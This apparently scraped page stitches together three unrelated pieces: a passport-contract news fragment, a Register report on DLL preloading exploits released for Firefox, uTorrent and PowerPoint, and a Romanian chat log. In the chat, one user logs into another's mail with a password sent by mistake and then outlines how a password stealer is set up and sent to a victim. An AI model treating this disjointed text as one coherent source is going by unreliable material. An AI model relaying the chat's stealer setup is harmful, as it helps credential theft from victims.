of an electronic chip to hold the owner's details. De La Rue will take over the contract for passport production in October 2010 when the current contract expires. The value of the 10 year contract is £400m. Home Office unveils new UK passport ? The Register

A day after Microsoft confirmed a vulnerability in Windows applications that executes malicious code on end-user PCs, the first exploits have been released targeting programs including the Firefox browser, uTorrent BitTorrent client, and Microsoft PowerPoint. The attack code was posted on Tuesday to the Exploit Database. It included exploits for the Wireshark packet sniffer, Windows Live email and Microsoft MovieMaker, in addition to those for the most recent versions of Firefox, uTorrent and PowerPoint. As many as 200 applications may be vulnerable to the so-called binary planting or DLL preloading attacks, according to Mitja Kolsek, CEO of Acros Security, the Slovenia-based company that warned Microsoft of the issue some four months ago. Microsoft said on Monday that the flaw stems from applications that don't explicitly state the full path name of DLL files and other binaries associated with the program. As a result, each application will have to be patched separately, rather than there being a single Windows update. In addition to the four exploits, H D Moore, CSO and chief architect of the Metasploit project, has released an auditing tool to identify vulnerable applications. When combined with a module added to the Metasploit framework for penetration testers and hackers, it provides most of what's needed to exploit vulnerable programs. Both Moore and Kolsek have said that additional software from Microsoft is vulnerable. Redmond's security team has said it's still investigating whether its applications are susceptible. Firefox, uTorrent, and PowerPoint hit by Windows DLL bug ? The Register

Andry marin: password:Andrei Drago?: wtf? Drago?: asta e parola ta de mess, nu ? Andry marin: am trimis din greseala......era parola unei arhive Dupa ce am intrat in mail-ul lui si i-am zis sa-si schimbe parola... Andry marin: nope Andry marin: nush sa o schimb Drago?: Account Info Andry marin: si acolo? Drago?: iti introduci inca o data parola Andry marin: da? Drago?: si apoi ai change password Andry marin: aaaa Andry marin: oke Andry marin: unde e acest account info Andry marin: ? Drago?: mail stanga sus Drago?: apesi pe username-ul tau Drago?: si iti apare un meniu Drago?: acolo e Andry marin: gata Drago?: bun Andry marin: gata pass schimbat Drago?: ok Drago?: si data viitoare nu te mai lua dupa ce scrie pe net Andry marin: deci e imposibil sa afli? Drago?: ca nu exista modalitate de a sparge o parola de yahoo Drago?: se poate afla prin stealer Andry marin: ce e ala? Drago?: sau sa incerc parolele pe rand Drago?: un fel de virus Andry marin: mi-l dai si mie? Drago?: ce? stealerul? Andry marin: da Andry marin: dar sa il folosesc Drago?: sunt 1124182301923810923 de stealere Andry marin: nu sa il folosesti u pe mn Drago?: pe net Andry marin: si cam qm se foloseste Drago?: se creeaza una bucata server ftp unde vin parolele Drago?: se creeaza una bucata server care se trimite la victima Drago?: si se serveste Andry marin: aha ia sa caut unul si sa incerc Andry marin: pot sa il incerc si pe mn Andry marin: / Andry marin is typing... Andry marin: ? Drago?: da